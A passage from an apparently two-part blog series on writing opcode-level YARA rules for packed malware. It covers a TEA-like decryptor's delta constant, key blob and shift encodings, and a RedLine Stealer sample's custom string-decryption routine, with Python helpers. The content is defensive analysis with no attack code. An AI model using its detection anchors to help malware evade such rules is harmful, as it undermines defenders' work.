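    The little-endian byte order printed at the end is the form the constant takes when it sits inside x86 code, which is what a byte-level rule has to match.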

    At that point, verification becomes boring—in a good way. The same constant and mixing shape shows up cleanly in public TEA reference code (for example, the implementation in tea.c here – https://github.com/coderarjob/tea-c/blob/master/tea.c). And if the goal is to sanity-check fast instead of debating patterns by eye, tools like FindCrypt can do the constant-hunting automatically—findcrypt.py will label common crypto constants and point straight at the routine addresses it matches.

    Figure 15. A public TEA reference (tea.c) shows the same 0x9E3779B9 delta and shift/XOR mixing pattern
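    For comparison while reading the decompiled loop, here is textbook TEA in Python, walking a buffer in 8-byte steps the way sub_4030E0 does. This is the reference algorithm only: the sample's routine is described as TEA-like and may deviate, and the key below is a placeholder, not the sample's key.

```python
import struct

DELTA = 0x9E3779B9
MASK = 0xFFFFFFFF
ROUNDS = 32


def tea_encrypt_block(v0, v1, key):
    k0, k1, k2, k3 = key
    total = 0
    for _ in range(ROUNDS):
        total = (total + DELTA) & MASK
        v0 = (v0 + (((v1 << 4) + k0) ^ (v1 + total) ^ ((v1 >> 5) + k1))) & MASK
        v1 = (v1 + (((v0 << 4) + k2) ^ (v0 + total) ^ ((v0 >> 5) + k3))) & MASK
    return v0, v1


def tea_decrypt_block(v0, v1, key):
    k0, k1, k2, k3 = key
    total = (DELTA * ROUNDS) & MASK  # 0xC6EF3720 for 32 rounds
    for _ in range(ROUNDS):
        v1 = (v1 - (((v0 << 4) + k2) ^ (v0 + total) ^ ((v0 >> 5) + k3))) & MASK
        v0 = (v0 - (((v1 << 4) + k0) ^ (v1 + total) ^ ((v1 >> 5) + k1))) & MASK
        total = (total - DELTA) & MASK
    return v0, v1


def process_buffer(data: bytes, key, block_fn) -> bytes:
    """Apply `block_fn` to each 8-byte block (two little-endian DWORDs)."""
    out = bytearray()
    for offset in range(0, len(data) - len(data) % 8, 8):
        v0, v1 = struct.unpack_from("<II", data, offset)
        out += struct.pack("<II", *block_fn(v0, v1, key))
    return bytes(out)


placeholder_key = (0x01234567, 0x89ABCDEF, 0xFEDCBA98, 0x76543210)  # not the sample's key
plaintext = b"8 bytes!second!!"
ciphertext = process_buffer(plaintext, placeholder_key, tea_encrypt_block)
print(process_buffer(ciphertext, placeholder_key, tea_decrypt_block))
```

    The decrypt direction starts from DELTA multiplied by the round count, so 0xC6EF3720 is a second constant worth searching for when 0x9E3779B9 is present.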

    But that familiarity is exactly the trap. TEA-style loops aren’t rare, and writing a detection rule around “TEA exists” is the fastest way to gift yourself false positives. So the focus shifts to what isn’t generic: the custom glue around the algorithm—especially the parts the author had to choose. In this case, that means the key material and the way it’s staged and referenced. The algorithm can be common. The key almost never is.

    sub_4030E0 is renamed to TEA_ProcessBuffer_8ByteBlocks, and sub_402F00 is renamed to TEA_LikeDecryptBlock to reflect the TEA-style decryption flow.

    Identifying the Key

    Once you’ve seen 0x9E3779B9 sitting inside a 32-round shift/XOR/add loop, the algorithm stops being a debate. It’s TEA-family math. Close enough that the function could change clothes, switch variable names, sprinkle junk calls, and still keep the same posture.

    But that’s also where the real problem starts.

    Because detecting “TEA exists” is worthless on its own. TEA-like loops show up in clean software, in academic code, in legitimate packers, and in every copy-paste loader written by someone who spent ten minutes on GitHub. The algorithm is reusable. The implementation pattern is reusable.

    The key isn’t.

    And that’s the shift: once the decryptor is identified, the next thing you hunt is the part the author actually had to choose.

    The key isn’t passed in. It’s baked into globals.

    Textbook TEA hands you a clean uint32_t k[4]. This sample doesn’t. It hides the key material where analysts hate looking: globals that feel like boring state.

    Figure 16. The decryptor loads its 4-DWORD key straight from global memory (dword_425CA8/425CAC/425CB0/425CB4)—the moment the routine stops looking generic and starts revealing the fingerprint behind the TEA-style loop.

    Right at the top of the routine you can see the four values getting pulled in:

    dword_425CA8

    dword_425CAC

    dword_425CB0

    dword_425CB4

    They get loaded into working variables once, then used repeatedly inside the round logic.

    Figure 17. Inside the round loop, the decryptor starts mixing the renamed key variables (v2, v13, v16, v15 → Key_Dword0–Key_Dword3) into the shift/XOR/add math that drives each 8-byte block transformation.

    Once those four values are found, everything gets simpler.

    You don’t need to obsess over whether the implementation is TEA, XTEA, “TEA-ish,” or a custom remix. That argument dies the moment you realize you’re not trying to detect crypto.

    You’re trying to detect ownership.

    And keys are ownership.

    Most samples can borrow an algorithm. Most samples don’t share the same 128-bit key sitting in .data.

    Figure 18. Four hardcoded DWORDs in .data (dword_425CA8–425CB4)—the key material the decryptor is built around.

    Writing the YARA Rule

    Figure 19. YARA rule detecting the TEA-like decryptor stub via embedded key material, delta constant, and shift/mix opcode patterns (left/right shifts).

    Let’s look at how this TEA-stub rule is structured. It’s not trying to fingerprint a whole function end-to-end. It’s doing something more practical: pinning down the few things a TEA-like decryptor can’t hide without rewriting itself. This rule is built around three deliberate checkpoints:
    1) The embedded 16-byte key blob
    2) The TEA delta constant (0x9E3779B9)
    3) The shift-mixer fingerprints (<<4 and >>5) — with a proximity window so the shifts aren’t “anywhere in the binary”, they’re near the crypto logic

    That’s the difference between a rule that “matches something with bitshifts” and a rule that matches a decryptor.

    $keyblob (the real identity)

    The strongest anchor in this rule is the key material.
    16 85 9E 04 DF 08 EB C1 38 39 CE 43 86 D2 0F 8D
    Those are not “random bytes” in the file. In the context of TEA-style routines, this is the part that matters most: the key is the author’s fingerprint. TEA/XTEA as algorithms are boring — they exist everywhere. But this specific key does not. That’s why the rule doesn’t just match $k0 $k1 $k2 $k3 individually — it matches them as one contiguous $keyblob. Contiguity matters because it reduces accidental collisions and makes it harder for trivial re-ordering to bypass. If the decryptor is recompiled, the stack frame changes. If the decryptor is optimized, registers change. But that key blob? It usually stays exactly the same unless the operator rotates it. So in practice: $keyblob is your “who”.
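    To line the blob up with what IDA shows, it helps to split it into the four little-endian DWORDs the decryptor reads. The sketch assumes the bytes are stored in the same order as the four consecutive globals (dword_425CA8 through dword_425CB4); that mapping is an inference from the layout, not something the rule itself states.

```python
import struct

KEY_BLOB = bytes.fromhex("16 85 9E 04 DF 08 EB C1 38 39 CE 43 86 D2 0F 8D")

# Four consecutive little-endian DWORDs, as a 32-bit x86 binary would load them.
key_dwords = struct.unpack("<4I", KEY_BLOB)

for index, value in enumerate(key_dwords):
    print(f"Key_Dword{index} = 0x{value:08X}")
```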

    $delta (the TEA tell)

    TEA-like mixing almost always drags the delta constant into the routine:
    B9 79 37 9E => 0x9E3779B9 (little endian)
    This delta is a recognizable artifact of the TEA family. It’s not “proof” by itself — constants can appear anywhere — but when it’s present alongside a hardcoded 16-byte key it stops being random and starts being intent. That’s why this rule treats $delta as a required anchor rather than a bonus string.
    In practice: $delta is your “what family”.

    $shl4_* and $shr5_* (the mixer shape)

    TEA mixing patterns commonly use:
    (v << 4) (v >> 5)
    That exact “4 and 5” pairing shows up so often that it becomes a shape, not just an instruction.
    But here’s the nuance: if we only matched C1 E0 04 (shl eax,4) and C1 EE 05 (shr esi,5), the rule would be brittle. Different builds choose different registers.

    So the rule expands that into register-agnostic families:
    C1 E0..E7 04 for shl r32,4
    C1 E8..EF 05 for shr r32,5
    That’s why you see $shl4_0 .. $shl4_7 and $shr5_0 .. $shr5_7: one string per register encoding. A single wildcard such as C1 E? 04 would be looser than intended, because the E8..EF half of that range encodes shr rather than shl. Same intent. Different register choices. Still caught. In practice: the shifts are your “how it mixes”.
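    The eight variants per shift fall straight out of the x86 ModRM byte: for opcode C1, the top two bits select register mode, the middle three select the operation (4 for shl, 5 for shr), and the low three select the register. A small encoder makes the ranges visible; the helper name is illustrative.

```python
REGISTERS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
OPCODE_EXT = {"shl": 4, "shr": 5}  # the /4 and /5 extensions of opcode C1


def encode_shift(op: str, reg: str, imm: int) -> bytes:
    """Encode `op reg, imm8` for a 32-bit register."""
    modrm = 0xC0 | (OPCODE_EXT[op] << 3) | REGISTERS.index(reg)
    return bytes([0xC1, modrm, imm])


for reg in REGISTERS:
    print(f"shl {reg},4 -> {encode_shift('shl', reg, 4).hex(' ')}   "
          f"shr {reg},5 -> {encode_shift('shr', reg, 5).hex(' ')}")
```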

    Proximity window (where the rule becomes “crypto-aware”)

    This is the part that upgrades it from “pattern matching” to “context matching”. The rule doesn’t just require:
    one shl ?,4
    one shr ?,5
    It requires that these shifts occur near the delta constant:
    @delta ± 0x400 bytes
    That constraint is doing a lot of heavy lifting, because without it those bitshifts could be coming from hash routines, bitfield parsing, bitmap operations, compression, UI rendering code—basically anything. But when the shifts show up close to TEA delta, it strongly suggests you’re looking at the TEA-like round logic area, not random code elsewhere. This is what keeps the rule behavioral, not accidental.
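    The rule text itself lives in Figure 19, so the following is only a Python approximation of the conditions described above: key blob present, delta present, and at least one shl-by-4 and one shr-by-5 within 0x400 bytes of a delta hit. It is handy for sanity-checking the logic against a dumped stub before running real YARA; the function name is an assumption.

```python
import re

KEY_BLOB = bytes.fromhex("16859E04DF08EBC13839CE4386D20F8D")
DELTA = bytes.fromhex("B979379E")           # 0x9E3779B9, little endian
SHL4 = re.compile(rb"\xC1[\xE0-\xE7]\x04")  # shl r32, 4
SHR5 = re.compile(rb"\xC1[\xE8-\xEF]\x05")  # shr r32, 5
WINDOW = 0x400


def looks_like_tea_stub(data: bytes) -> bool:
    """Key blob anywhere, plus both shifts near at least one delta occurrence."""
    if KEY_BLOB not in data:
        return False
    pos = data.find(DELTA)
    while pos != -1:
        nearby = data[max(0, pos - WINDOW):pos + WINDOW]
        if SHL4.search(nearby) and SHR5.search(nearby):
            return True
        pos = data.find(DELTA, pos + 1)
    return False
```

    Checking every delta occurrence, rather than only the first, keeps an unrelated copy of the constant elsewhere in the file from masking the real routine.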

    Testing the Rule

    Before this rule goes anywhere near a real scan, the first check is always noise: does it light up on clean software? The quickest sanity pass is a VirusTotal grep-style sweep using the hard anchors from the rule — the 16-byte key blob, the TEA delta (0x9E3779B9), and the TEA-like shift mixer hints (shl 4 / shr 5). If the search stays quiet (positives: 0 or close), it’s a strong sign the pattern isn’t just matching generic compiler output.

    After that, testing moves to Retrohunt (same workflow as Part 1): run the rule against a goodware-biased corpus for restraint, then against the default corpus to see whether it surfaces related binaries.

    We’ll stop here for now. Part 3 will look at what happens when imports disappear too — API names replaced with hashing routines, and everything resolved at runtime just to stay unreadable.

    References

    TEA C Implementation – https://github.com/coderarjob/tea-c

    YARA Documentation – https://yara.readthedocs.io/en/latest/

    VirusShare – https://virusshare.com/

  • Part 1: When Strings Disappear: Rethinking YARA at the Opcode Level

    Author: Valli-Nayagam Chokkalingam

    Most YARA rules start with strings. This post looks at what’s left when strings disappear—and how detection shifts closer to execution itself.

    The focus here is on how YARA rules are reasoned about, not on providing production-ready signatures or drop-in detection rules.

    What YARA Is (and What It Isn’t)

    YARA is a pattern-matching tool. It scans data — files, memory regions, or raw byte streams — and checks whether specific patterns are present. Those patterns are defined explicitly by the analyst. There’s no inference, no behavior tracking, and no execution context unless you deliberately build it into the rule.

    That simplicity is both the strength and the limitation. YARA works well when something stable exists to anchor on: reused code, recognizable strings, or consistent structures. Where it struggles is when those artifacts are deliberately minimized, transformed, or never exist in a static form at all. Understanding YARA starts with accepting that boundary. It’s not a behavioral detector — it’s a lens, and everything that follows depends on what remains visible through it.

    Figure 1. A simple string-based YARA rule relying on recognizable ransom note text, illustrating the traditional starting point for static detection.

    Where String-Based Detection Starts to Fail

    Figure 1 shows a familiar starting point: a YARA rule built around plaintext ransom note strings. This approach works when those strings exist in a form that can be scanned on disk. Many samples still fit that model, which is why string-based rules remain common and often effective.

    The problem is that those strings are also the easiest thing to remove. Packing alone is enough to make them disappear from static analysis. Even without a full packer, simple string encryption, runtime decoding, or stack-based construction is sufficient to break disk-level matching. Once the binary no longer carries readable text, the rule has nothing to anchor on.
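    How little it takes is easy to show. In the sketch below a single-byte XOR stands in for "simple string encryption"; the marker text, the key, and the fake image bytes are all invented for the demonstration.

```python
def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a one-byte key."""
    return bytes(b ^ key for b in data)


marker = b"YOUR FILES HAVE BEEN ENCRYPTED"   # hypothetical ransom-note string
plain_image = b"\x90" * 16 + marker + b"\x90" * 16
encoded_image = xor_bytes(plain_image, 0x5A)

print(marker in plain_image)                       # what a string rule sees before encoding
print(marker in encoded_image)                     # what it sees on disk afterwards
print(marker in xor_bytes(encoded_image, 0x5A))    # what exists once decoded at runtime
```

    The bytes a string rule anchors on only come back after the decoding step runs, which is exactly the window a disk scan never sees.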

    The same applies to imports. When APIs are resolved dynamically—through hashing or manual lookup—the import address table no longer reflects what the program will actually call. From a static scanner’s perspective, both the strings and the intent are gone, even though execution behavior remains unchanged.

    In-memory scanning can recover some of that visibility, but it comes with tradeoffs. Memory-wide YARA scans are expensive, noisy, and difficult to run continuously at scale. They also depend on timing: the artifact has to exist in memory long enough to be seen. Short-lived decoding routines or transient strings can still slip through.

    At that point, the limitation isn’t YARA itself. It’s the assumption that detection starts with readable artifacts. As soon as those artifacts stop existing on disk, string-based detection stops being a reliable first step.

    Figure 2. Comparison of an unpacked and packed Hello World executable, showing how simple packing is enough to remove readable string artifacts from disk.

    From Source Code to Opcodes

    Source code is written for people. It explains intent, names things clearly, and makes sense at a glance. None of that is what actually runs. Once the compiler is done, the program exists only as instructions the CPU can execute.

    Figure 3 shows that shift in a very simple way. A small Hello World program in C is easy to follow at the source level. After compilation, that view disappears. What remains is assembly: individual instructions that tell the processor exactly what to do—move data, prepare arguments, call a function, return control.

    At that level, everything is reduced to opcodes and operands. The opcode is the instruction itself—move this, call that, jump here. The operands are the values or locations the instruction works on: registers, memory addresses, constants. Together, they form the instruction stream the CPU steps through one operation at a time.

    Strings tend to stand out during analysis because they’re readable, but they’re not essential. They’re just data sitting alongside the code. The instruction stream is different. Whether a binary is packed, encrypted, or stripped down, those opcodes still have to execute to make anything happen.

    That’s the layer that survives. When readable artifacts fade away, execution doesn’t. What’s left is the flow of instructions—opcodes acting on operands—that carries the program forward, regardless of how much effort went into hiding everything else.

    Figure 3. A simple C Hello World program alongside its compiled assembly, illustrating how readable source code is reduced to executable instructions.

    Looking Closer at the Instruction Bytes

    We’ll stick to the first three instructions that run inside main from the Hello World example in Figure 3. Not the whole function. Just where execution actually starts. Each one is pulled out on its own in Figures 4, 5, and 6.

    By this point, there’s no source code left. No structure to lean on. The CPU is just walking bytes. Each instruction is a short sequence, read as a unit, then executed. That’s it.

    Figure 4. The first instruction executed inside main, adjusting the stack pointer to establish a usable stack frame.

    This instruction exists to move the stack pointer.

    48 is the REX.W prefix that makes this a 64-bit operation. Without it, the same bytes would operate on esp rather than rsp.

    83 selects the arithmetic group that takes a sign-extended 8-bit constant.

    EC is the ModRM byte. Its middle bits pick subtraction out of that group, and its low bits resolve the target register to rsp.

    28 is the value. 0x28 gets subtracted from the stack pointer.

    No locals. No memory access. Just the stack pointer being nudged into place so the function can run.
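
    The same breakdown can be checked mechanically. This is a small sketch that splits the four bytes from Figure 4 into their fields; the helper name is my own.

```python
def split_modrm(byte: int):
    """Split a ModRM byte into its mod (2 bits), reg (3 bits), and rm (3 bits) fields."""
    return (byte >> 6) & 0b11, (byte >> 3) & 0b111, byte & 0b111


insn = bytes.fromhex("4883EC28")          # sub rsp, 0x28
rex, opcode, modrm, imm8 = insn           # iterating bytes yields integers

rex_w = bool(rex & 0x08)                  # REX.W bit: 64-bit operand size
mod, reg, rm = split_modrm(modrm)

print(f"REX.W={rex_w} opcode={opcode:#04x} mod={mod:02b} reg={reg:03b} rm={rm:03b} imm8={imm8:#04x}")
```

    For EC the fields come out as mod 11 (register operand), reg 101 (the extension that selects SUB within the 0x83 group), and rm 100 (rsp).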

    Figure 5. An instruction computing the address of the string and placing it into a register for use as a function argument.

    This one prepares the argument for the call that follows.

    Same 48 prefix. Same 64-bit context.

    8D marks this instruction as lea. That matters. Nothing is being read here. Only the address of the string “Hello World!\n” is loaded into rcx.

    0D encodes the destination register and the addressing mode: rcx, RIP-relative. The remaining bytes form the displacement. Added to the address of the next instruction, they land on the string “Hello World!\n”.

    The string itself isn’t touched. Only the address ends up in rcx. That’s enough.

    Figure 6. A relative call instruction transferring execution to another routine without relying on symbols or absolute addresses.

    This is the handoff.

    E8 identifies the instruction as a call.

    The bytes after it are just an offset. Signed. Relative. No absolute address anywhere.

    At runtime, the CPU adds that offset to the address of the instruction following the call and jumps. A return address gets pushed. Execution continues within the function sub_140001010, which is responsible for printing the string to the console.
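
    The arithmetic behind a relative call is short enough to sketch. The call address and displacement bytes below are hypothetical, picked so the result lands on sub_140001010; the real values are whatever Figure 6 shows.

```python
import struct


def rel32_target(insn_addr: int, insn_len: int, disp_bytes: bytes) -> int:
    """Target = address of the next instruction + signed little-endian 32-bit displacement."""
    (disp,) = struct.unpack("<i", disp_bytes)
    return (insn_addr + insn_len + disp) & 0xFFFFFFFFFFFFFFFF


# Hypothetical placement: a 5-byte "E8 rel32" call sitting at 0x14000107B.
call_bytes = bytes.fromhex("E890FFFFFF")
target = rel32_target(0x14000107B, len(call_bytes), call_bytes[1:])
print(hex(target))
```

    The RIP-relative lea from Figure 5 resolves the same way: take the address of the next instruction and add the signed displacement.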

    What Detection Anchors On When Artifacts Are Gone

    When strings stop being reliable, the remaining signals come from execution itself. Code still has to unpack, decrypt, or resolve what it needs before it can do anything useful. That work leaves structure behind, even when everything else is stripped away.

    Figure 7 groups those structures into a few broad buckets—custom packers, known algorithms, and hashing logic—before we step through each one individually.

    Figure 7. Detection patterns that persist after strings disappear.

    Custom Packer Logic: String Decryption Rule

    For this post, I’m using a RedLine Stealer sample from VirusShare.
    SHA-256: 00da14d8bbe2c85a04314b0ac40c13ebb67fe6693af8e786e63a2c6f6a428b00.

    Opening the sample in Detect It Easy, the overall picture becomes clear almost immediately. The binary identifies as a standard PE32, built with Visual C++, but that familiarity stops there. The heuristic flags tell the real story: compressed or packed data, elevated entropy, and a resource section doing more work than it should. There’s even a loose heuristic hint toward .NET Reactor–like behavior, but with no managed metadata to back it up—just import patterns that resemble what Reactor-protected samples often expose, making it a cue to dig deeper rather than a conclusion to trust. At best, this suggests some custom, Reactor-inspired techniques in play rather than a clean, off-the-shelf protector.

    Figure 8. The file presents as a packed PE—high entropy, compressed resources, and little else to work with.

    The entropy view reinforces that suspicion. The PE header and a couple of standard sections sit where you’d expect them, with relatively low entropy. But both the .text section and, more noticeably, the .rsrc section spike sharply. The resource section in particular stays near the upper end of the scale across its entire range—consistent with compressed or encrypted content rather than icons, dialogs, or version metadata. Whatever this binary is carrying, it isn’t meant to be readable on disk.
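
    For readers who want to see what the entropy graph is measuring, here is a minimal sketch of per-window Shannon entropy. The window size and the test data are arbitrary choices for illustration, not what Detect It Easy uses internally.

```python
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for constant data, 8.0 for a uniform byte distribution."""
    if not data:
        return 0.0
    total = len(data)
    return sum((n / total) * math.log2(total / n) for n in Counter(data).values())


def windowed_entropy(data: bytes, window: int = 256):
    """Entropy of consecutive fixed-size windows, similar in spirit to an entropy graph."""
    return [shannon_entropy(data[i:i + window]) for i in range(0, len(data), window)]


padding = b"\x00" * 512              # low-entropy filler, like header padding
dense = bytes(range(256)) * 2        # every byte value equally often
print([round(e, 2) for e in windowed_entropy(padding + dense)])
```

    Compressed or encrypted data sits close to the 8.0 ceiling, which is why a resource section that stays high across its whole range stands out.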

    Figure 9. .text carries more entropy than expected, alongside a dense .rsrc, pointing to logic and data deliberately blurred at rest.

    That expectation carries over into the strings view. Scanning the binary surfaces almost nothing of value. There are no configuration strings, no URLs, no user-facing messages, no obvious markers that could anchor a meaningful signature. What does appear are a small set of import-related API names—exactly the strings the Windows loader requires to resolve imports at runtime. Everything else is either short, high-entropy fragments or completely nonsensical output from the packed data. From a static perspective, the binary offers no stable plaintext indicators beyond what’s structurally unavoidable.
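
    A strings pass is simple enough to sketch in a few lines. The blob below is a hypothetical stand-in for a packed file, with two import names surrounded by non-printable filler.

```python
import re


def ascii_strings(data: bytes, min_len: int = 5):
    """Yield runs of printable ASCII at least min_len bytes long, like a basic strings tool."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    for match in pattern.finditer(data):
        yield match.group().decode("ascii")


# Hypothetical blob: two import names surrounded by non-printable filler.
blob = b"\x01\x02FindResourceA\x00\xff\xfe\x9c\x13LoadResource\x00\x8a\x07ab\x00"
print(list(ascii_strings(blob)))
```

    Only the import names survive the length filter. That matches the picture in the strings view: the loader needs those names in plaintext, and nothing else has to be.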

    Figure 10. The strings view offers little beyond imported API names; everything else is noise or encrypted.

    With static inspection tapped out in Detect It Easy, the next step is obvious: load the binary into IDA and follow execution instead of artifacts. Right at the top of main, before anything meaningful happens, execution funnels into sub_401650. That function runs immediately, reconstructing data byte-by-byte and handing the result back to the caller. In the debugger, the payoff is clear—the decrypted output resolves to Cor_Enable_Profiling, a string that never appears in plaintext on disk.

    Figure 12. Execution drops straight into sub_401650 at the very start of main.

    Figure 13. Stepping through the code shows the same routine decrypting data in memory at runtime, confirming the strings never exist in plaintext on disk.

    That placement matters. A decryption routine sitting at the very start of main isn’t incidental—it’s foundational. At this point, the question stops being what strings exist and shifts to how they’re being rebuilt, and what that reconstruction logic looks like under the hood.

    Looking deeper into sub_401650, it’s immediately clear what this isn’t. There’s no key schedule, no state array, no rounds, no diffusion step that even vaguely resembles RC4, AES, or any standard algorithm. Nothing is iterated. Nothing evolves. Each byte is touched once, transformed, and discarded.

    The logic is blunt and handcrafted. A fixed 32-byte buffer goes in. A fixed sequence of XORs and a single NOT is applied. The constants are embedded directly in the instruction stream—no derivation, no reuse, no abstraction.
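
    To show the general shape, here is a sketch of a routine built that way. It is not a clone of sub_401650: the constant table and the position of the NOT are placeholders I made up, and only the overall structure (a fixed 32-byte buffer, one hard-coded operation per byte) follows the description above.

```python
BUF_LEN = 32  # fixed buffer length described above

# Placeholder per-position XOR constants; the real routine's values and order are not reproduced here.
XOR_CONSTANTS = [(0xA3 + 7 * i) & 0xFF for i in range(BUF_LEN)]
NOT_INDEX = 5  # hypothetical position of the single NOT


def transform(buf: bytes) -> bytes:
    """Apply one fixed operation per byte: XOR with a hard-coded constant, or NOT at one position."""
    if len(buf) != BUF_LEN:
        raise ValueError("expected a 32-byte buffer")
    out = bytearray(BUF_LEN)
    for i, b in enumerate(buf):
        out[i] = (~b & 0xFF) if i == NOT_INDEX else b ^ XOR_CONSTANTS[i]
    return bytes(out)


# XOR and NOT are both self-inverse, so the same function encodes and decodes.
plain = b"Cor_Enable_Profiling".ljust(BUF_LEN, b"\x00")
stored = transform(plain)            # what would sit in the binary at rest
print(stored.hex())
print(transform(stored).rstrip(b"\x00").decode("ascii"))
```

    There is no key to extract and no state to track. The constants are the algorithm, which is why they end up as immediates in the instruction stream.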

    That custom shape is exactly what gives the routine its detection value. Even when strings disappear, this logic remains stable and specific to the sample, making it a strong candidate for a YARA rule anchored in opcodes.

    Figure 14. sub_401650 performing fixed, byte-by-byte decryption using hard-coded constants—custom logic, not a standard cipher.

    Figure 15. Cross-references show sub_401650 called repeatedly, decrypting multiple embedded strings across main.

    Figure 16. Direct Python clone of sub_401650 for string decryption.

    Finding a distinctive routine is only the first step. Once sub_401650 stands out as something worth anchoring on, the next question is restraint. A good rule doesn’t just match—it knows when not to. You don’t want this logic firing on clean binaries that happen to use a few XORs, and you don’t want it so narrow that it misses sibling samples built by the same actor. The goal is balance: tight enough to avoid noise, loose enough to catch the family and its close variants that reuse the same string-hiding approach.

    That’s also where performance starts to matter. YARA doesn’t run in a vacuum. In production, every rule competes for CPU time, memory, and scan budget. The more work a rule does, the more selective it needs to be about when that work runs. This is why a raw code pattern is rarely left alone. You layer it with cheap filters first: file size bounds, PE characteristics, section counts, presence or absence of a security directory, even coarse-grained signals like import hash or compiler fingerprints. You can narrow further by checking how execution begins: whether main follows a familiar setup before decryption kicks in, or whether certain code bytes consistently appear just ahead of the routine.

    All of that isn’t about weakening the detection. It’s about shaping it. The decryption logic remains the core signal, but everything around it helps decide when that signal is worth evaluating. That’s how a rule moves from “interesting” to usable: specific enough to matter, efficient enough to survive real-world scanning.

    For this post, though, that full tuning exercise stays out of scope. The focus here isn’t on squeezing every last microsecond out of a production rule or debating scan-time tradeoffs. It’s about understanding what makes a piece of code worth anchoring on in the first place, before performance and deployment concerns enter the picture.

    The next step, then, is to get closer to the bytes themselves. To do that, you need to look past pseudocode and into the actual opcode stream. In IDA, that means switching on opcode bytes in the disassembly view—so each instruction shows not just what it does, but how it’s encoded. That’s the level YARA ultimately reasons about. Once those bytes are visible, the decryption routine stops being an abstract idea and becomes a concrete sequence you can measure, compare, and eventually express as a rule.

    Figure 17. Opcode bytes exposed beside each instruction — the raw material for YARA beyond strings.

    Figure 18. Sample YARA rule illustrating opcode-level detection of a custom string decryptor routine

    Let’s look at how the rule is structured. The logic isn’t spread evenly across the function—it’s anchored around a few deliberate checkpoints. We’ll walk through the $head, $m1, $m2 and $tail sequences in turn, and why each one was chosen to represent intent rather than incidental compiler noise. We’ll also unpack the use of ?? wildcards—where flexibility is intentional, and where the bytes matter enough that they’re locked down.

    $head

    The opening bytes are not interesting because they set up a stack frame—they’re interesting because of what follows immediately after. The routine pulls a pointer from the stack and starts reading one byte at a time using movzx. That’s the first signal: byte-wise handling, not block crypto.

    The paired XORs with hardcoded constants (A3, 54) matter because they’re embedded directly into the instruction stream. There’s no key material, no loop-driven derivation, no state carried forward. Each byte is treated in isolation. The single not cl stands out even more. Mixing a NOT into an otherwise XOR-only flow is uncommon and gives this routine a shape that’s easy to recognize and hard to accidentally reproduce.

    $m1 & $m2

    Instead of matching every transformation, the rule samples a few XOR pairs from the middle of the routine. Constants like B5/87 and 7B/0F aren’t special in a cryptographic sense—they’re special because they’re arbitrary. They exist only because the author chose them.

    Requiring multiple such pairs makes the rule resilient. One XOR constant could collide with benign code. Several, in a fixed order, almost never do. This keeps the rule wide enough to catch variants using the same routine, but narrow enough to avoid random matches.

    $tail

    The tail tells you what kind of function this is. push 20h fixes the output length at 32 bytes. The stack-based buffer, explicit null termination, and the call to memcpy leave little ambiguity about the goal: something opaque goes in, and a usable string comes out. The cleanup and return simply end the function.

    ?? wildcards

    Offsets, stack layout, and call targets shift between builds. You wildcard those and keep what reflects intent: constants, instruction order, and data flow. That’s how you avoid brittle, one-sample rules.
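
    Wildcards are easy to experiment with outside YARA. The sketch below converts a YARA-style hex string into a bytes regex and runs it over three made-up byte sequences. The anchor is illustrative and is not the rule from Figure 18: it encodes xor cl, 0xA3, then a mov [ebp+disp8], cl with the displacement wildcarded, then xor cl, 0x54 and not cl.

```python
import re


def hex_pattern_to_regex(pattern: str):
    """Compile a YARA-style hex string ("80 F1 A3 ?? ...") into a bytes regex; ?? matches any byte."""
    parts = []
    for token in pattern.split():
        parts.append(b"." if token == "??" else re.escape(bytes([int(token, 16)])))
    return re.compile(b"".join(parts), re.DOTALL)


# Illustrative anchor: constants and instruction order are fixed, the stack offset is not.
anchor = hex_pattern_to_regex("80 F1 A3 88 4D ?? 80 F1 54 F6 D1")

# Hypothetical builds: same logic with a shifted stack slot, and one with a different constant.
build_a = bytes.fromhex("55 80 F1 A3 88 4D F0 80 F1 54 F6 D1 C3")
build_b = bytes.fromhex("55 80 F1 A3 88 4D E8 80 F1 54 F6 D1 C3")
other = bytes.fromhex("55 80 F1 A4 88 4D F0 80 F1 54 F6 D1 C3")

for name, blob in (("build_a", build_a), ("build_b", build_b), ("other", other)):
    print(name, anchor.search(blob) is not None)
```

    The two builds differ only in the stack offset, so both match. The third changes a constant, which is exactly the part the pattern refuses to give up.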

    Testing the Rule: From Grep to Retro Hunt

    Before I let this anywhere near a real scan, I want one boring answer: does it light up on clean software? Opcode-level rules can be sharp, but they can also turn generic fast if you accidentally anchor on common compiler output.

    So the first pass is intentionally crude. A grep-style content search on VirusTotal over the byte windows I actually care about:

    Figure 19. A quick VT grep-style sweep over the opcode anchors to sanity-check noise—zero/few hits on clean PE files is exactly the signal you want before moving forward.

    A result like positives: 0 is exactly what you want at this stage. It doesn’t prove the rule is “correct,” but it does tell you something important: these anchors aren’t just matching random compiler soup across benign PE files. If this search came back with dozens or hundreds of hits, that’s an immediate red flag—the pattern is too loose, or you latched onto something common.

    Only if the search hits a very small number of clean files does hardening even enter the picture. At that point, the goal isn’t to pile on more opcode bytes. Bytes are expensive—every extra pattern makes the rule more brittle and more sample-specific. Good hardening reduces false positives without collapsing the rule into a single hash.

    A few practical knobs that usually help when refinement is actually needed:

    File size gates. Packers and small loaders tend to live in narrow size bands. A simple filesize < X or bounded range can drop noise fast.

    Structurally unavoidable strings. If the only plaintext left is import-related API names, use that. Even lightweight checks for things like FindResource, LoadResource, SizeofResource, VirtualProtect, or WriteProcessMemory can separate loaders from normal applications without relying on missing config strings.

    Section-scoped scanning. Don’t hunt these bytes across the entire file. Restricting matches to the .text section avoids coincidences in overlays or high-entropy resource blobs.

    Location constraints. If the routine consistently appears near the start of .text or within a tight window relative to the entry point, encode that habit. You’re not looking for “anywhere in the binary.”

    PE shape hints. Section count, section sizes, presence or absence of a security directory—none of these are signatures on their own, but they make excellent tie-breakers.
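
    Two of those knobs, the size gate and the section count, can be sketched as a cheap pre-filter. In a YARA rule they would correspond to conditions on filesize and pe.number_of_sections. The thresholds and the fake header below are placeholders, not tuned values.

```python
import struct


def pe_section_count(data: bytes):
    """Return NumberOfSections from the COFF header, or None if data is not a PE file."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)          # offset of the PE signature
    if e_lfanew + 8 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return None
    (sections,) = struct.unpack_from("<H", data, e_lfanew + 6)  # Machine at +4, NumberOfSections at +6
    return sections


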